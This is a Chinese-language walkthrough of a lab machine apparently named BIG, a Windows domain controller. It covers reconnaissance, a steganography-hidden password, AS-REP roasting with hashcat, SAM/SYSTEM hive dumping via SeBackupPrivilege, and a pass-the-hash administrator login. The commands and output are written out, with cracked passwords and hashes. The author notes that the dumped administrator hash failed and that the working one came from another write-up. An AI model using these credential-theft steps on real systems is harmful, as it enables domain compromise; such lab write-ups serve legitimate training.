4.BIG
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# fscan -h 192.168.212.4
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.212.4:445 open
192.168.212.4:139 open
192.168.212.4:80 open
192.168.212.4:88 open
192.168.212.4:135 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 192.168.212.4 [+] DC:BBR\BIG
[*] NetInfo
[*]192.168.212.4
[->]BIG
[->]192.168.212.4
[*] WebTitle http://192.168.212.4 code:200 len:435 title:None
已完成 5/5
[*] 扫描结束,耗时: 1.939563155s
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# nmap -sCV 192.168.212.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:00 CST
Nmap scan report for 192.168.212.4
Host is up (0.00026s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn''t have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-05 23:00:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:AD:59:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-05T23:00:19
|_ start_date: 2024-12-05T22:56:51
|_clock-skew: 14h59m57s
|_nbstat: NetBIOS name: BIG, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:59:c2 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.95 seconds
配一下域名
192.168.212.4 bbr.thl big.bbr.thl
网站
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# curl http://192.168.212.4
<!DOCTYPE html>
<html>
<head>
<style>
/* It was all a dream */
body {
background-image: url('big1.jpg');
background-size: cover;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
<h1>Music</h1>
<p>I keep it music music, I eat that lunch (Yeah)</p>
</body>
</html>
2.2. SMb空会话检测
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# smbmap -u anonymous -H 192.168.212.4
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
不存在 smb空会话
2.3. kerberute爆破
尝试kerberute 爆破
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# kerbrute userenum -d BBR.BIG.THL --dc 192.168.212.4 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/05/24 - Ronnie Flathers @ropnop
2024/12/05 16:34:26 > Using KDC(s):
2024/12/05 16:34:26 > 192.168.212.4:88
2024/12/05 16:34:26 > [!] info@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > [!] 2000@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > [!] john@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > Done! Tested 20 usernames (0 valid) in 0.002 seconds
也不行,看来只能从网站入手了
2.4. 目录扫描
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,bak,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,bak,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 151] [--> http://192.168.212.4/images/]
/contents (Status: 301) [Size: 153] [--> http://192.168.212.4/contents/]
/songs (Status: 301) [Size: 150] [--> http://192.168.212.4/songs/]
扫出来有三个目录
我们优先看 contents 目录
对这个目录在扫描一下
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/contents -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/contents
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/notify.txt (Status: 200) [Size: 112]
获取到一个文档
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# curl http://192.168.212.4/contents//notify.txt
Who the hell did you hire to create the website!
Hiding keys in MD5 again!
I'm going to fire that guy
music
翻译:
“到底是谁给你们开发的网站!
又用 MD5 隐藏密钥了!
我要解雇那个家伙。”
“music”
意思是有个秘钥被Md5加密了
还得到一个用户 music
在扫描一下 songs 目录下的文件
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/songs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/songs
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/juicy.txt (Status: 200) [Size: 3350]
Progress: 415286 / 415288 (100.00%)
===============================================================
Finished
===============================================================
juicy.txt 是一个歌词文档 。没有什么东西
3. big图片解密
再看看另外的一个文件夹
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/images -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt - x jpg,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/images
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: png,jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/big4.jpg (Status: 200) [Size: 196567]
Progress: 622929 / 622932 (100.00%)
===============================================================
Finished
===============================================================
这有一个图片叫 big4.jpg 而且知道首页的图片是 big1.jpg
那我估计还有好几个big2、3、4、5、6之类的
尝试都下下来
经过测试 一共有4张图片
我内个大帅哥啊
这几张图片里面肯定是有东西的
对图片进行检测是否存在隐藏内容
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# stegseek --seed big2.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found (possible) seed: "c2726679"
Plain size: 43.0 Byte(s) (compressed)
Encryption Algorithm: rijndael-128
Encryption Mode: cbc
对四个检测后发现 big2.jpg 存在隐写。但是需要密码才能解密
前面有提到密码是一个md5
之前网站源码里面是有一段关键的话的 It was all a dream
尝试对这个进行md5 然后使用md5运算后的值进行解密
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# echo -n 'It was all a dream' |md5sum
99ae77c0c0faf78b872f9f452e3eaa24 -
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# steghide extract -sf big2.jpg
Enter passphrase: 99ae77c0c0faf78b872f9f452e3eaa24
wrote extracted data to "frase.txt".
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# cat frase.txt
Bigpoppa1972
成功获取到一个字符串 应该是密码
4. 提权
利用 music : Bigpoppa1972 winrm登录上来
先看权限有没有可以利用的
*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
没有看到可以直接用的
4.1. 利用Bloodhound收集域内环境
收集域内信息
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# netexec ldap 192.168.212.4 -u 'music' -p 'Bigpoppa1972' --bloodhound --collection All --dns-server 192.168.212.4
SMB 192.168.212.4 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
LDAP 192.168.212.4 389 BIG [+] bbr.thl\music:Bigpoppa1972
LDAP 192.168.212.4 389 BIG Resolved collection methods: group, acl, dcom, session, rdp, psremote, container, trusts, objectprops, localadmin
LDAP 192.168.212.4 389 BIG Done in 00M 00S
LDAP 192.168.212.4 389 BIG Compressing output into /root/.nxc/logs/BIG_192.168.212.4_2024-12-06_083621_bloodhound.zip
导入进行分析
发现song用户是无预身份验证的账户
存在AS-REP漏洞
4.2. AS-REPRoasting
因为song 是无预身份验证的账户 即禁用预认证的用户
禁用预认证的用户会向域控制器发送不包含加密的身份验证请求,因此攻击者可以捕获 AS-REP 响应并进行密码破解。
我们可以进行 AS-REPRoasting 攻击
在攻击之前先同步域时间
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# rdate -n 192.168.212.4
Fri Dec 6 08:47:54 CST 2024
捕获 AS-REP 响应
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# impacket-GetNPUsers bbr.thl/song:123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Cannot authenticate song, getting its TGT
$krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729cd8e104cf$ce7dbe4474a7db21b21809a7af5f3416786079bc76f6f780dbea54769b28b03d04ca645a378eeddce0bee8615211f36cfeba66c4bf4c3b7c4adcc74b474482a977105c2d8571ff3b2393b5a61e1292c8ffa7b801ce0d76f1ae4d540ccabd7430f1f67175812a94ca527b707fc07644e6f22d2cba60f0f6e280b4f0f7dc28817df23202d8b9b81ca5d9a0ad02dcbed0a7d87b797236a902051c44a83ebe97f603b741754f36b1cbed5d9dd71d3cd82017db227d6a8004af1bf4007877cdcc2e7af7c83e60304973c0dcb5fbb98cebbe59334307b935065b1a4abbba83b5bb82cdb409
hashcat 破解发现用rockyou爆破不出来
可能是信息收集不够。 我们直接去看一下网站目录下有什么东西
*Evil-WinRM* PS C:\inetpub\wwwroot\songs> dir
Directory: C:\inetpub\wwwroot\songs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/2/2024 4:54 AM 3535 BigPoppa.txt
-a---- 5/2/2024 4:54 AM 4280 Hypnotize.txt
-a---- 5/2/2024 4:54 AM 3350 Juicy.txt
-a---- 5/2/2024 4:54 AM 1793 Skyisthelimit.txt
-a---- 5/3/2024 2:06 PM 168 web.config
可以发现网站 songs 目录下我们少拿了很多文件
都下下来看看
发现 Skyisthelimit.txt 里面是一个密码字典
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# cat Skyisthelimit.txt
123456
admin
12345678
123456789
1234
12345
password
123
Aa123456
1234567890
UNKNOWN
1234567
...
利用这个字典进行爆破
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# hashcat -a 0 -m 18200 as-rep.txt Skyisthelimit.txt
hashcat (v6.2.6) starting
$krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729cd8e104cf$ce7dbe4474a7db21b21809a7af5f3416786079bc76f6f780dbea54769b28b03d04ca645a378eeddce0bee8615211f36cfeba66c4bf4c3b7c4adcc74b474482a977105c2d8571ff3b2393b5a61e1292c8ffa7b801ce0d76f1ae4d540ccabd7430f1f67175812a94ca527b707fc07644e6f22d2cba60f0f6e280b4f0f7dc28817df23202d8b9b81ca5d9a0ad02dcbed0a7d87b797236a902051c44a83ebe97f603b741754f36b1cbed5d9dd71d3cd82017db227d6a8004af1bf4007877cdcc2e7af7c83e60304973c0dcb5fbb98cebbe59334307b935065b1a4abbba83b5bb82cdb409:Passwordsave@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729c...cdb409
Time.Started.....: Fri Dec 6 11:30:12 2024 (0 secs)
Time.Estimated...: Fri Dec 6 11:30:12 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (Skyisthelimit.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 429.8 kH/s (0.07ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 201/201 (100.00%)
Rejected.........: 0/201 (0.00%)
Restore.Point....: 0/201 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> qwerty123456
Hardware.Mon.#1..: Util: 13%
成功得到 song 用户的密码 Passwordsave@
利用账户密码登录上去 看一下 song 用户的权限
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
发现存在 SeBackupPrivilege (备份文件和目录) 权限
那么可以进行../../24-渗透姿势库/4-横向移动/1-Credentials/SAM & LSA secrets
在 song 用户的winrm客户端下
找一个可以下载的目录
转储sam 与系统注册表
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> reg save hklm\sam sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> reg save hklm\system system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> dir
Directory: C:\Users\TEMP.bbr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/5/2024 9:05 PM 36864 sam.hive
-a---- 12/5/2024 9:05 PM 9945088 system.hive
然后下载到kali
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> download sam.hive
Info: Downloading C:\Users\TEMP.bbr\Documents\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> download system.hive
Info: Downloading C:\Users\TEMP.bbr\Documents\system.hive to system.hive
Info: Download successful!
使用 impacket-secretsdump 从注册表转储文件中获取 ntlm 哈希
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xbb33617256ea48219d9d3d01766b7a9e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb1c50a48c37e053d2045cd5b55cd2f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
获取到管理员的哈希,3.PTH传递 登录上去
evil-winrm -i 192.168.212.4 -u administrator -H 5d48bcf84aea999fb1ade06970a81237
*Evil-WinRM* PS C:\users\music\documents> type user.txt
53bdf70c03ad626fe7a17ba5a9495b3a
*Evil-WinRM* PS C:\Users\Administrator\documents> type root.txt
8e824f6e933f0b62616aa54d75416184
这里有点问题。 我们获取到的hash是
bb1c50a48c37e053d2045cd5b55cd2f2
但是等不上去。 正确的hash是5d48bcf84aea999fb1ade06970a81237
看了一下wp。
5d48bcf84aea999fb1ade06970a81237 的来源是看的这个 wp
而且官方下面的 wp 用的又是 bb1c50a48c37e053d2045cd5b55cd2f2 登上去的
我猜测可能是用户改变导致的
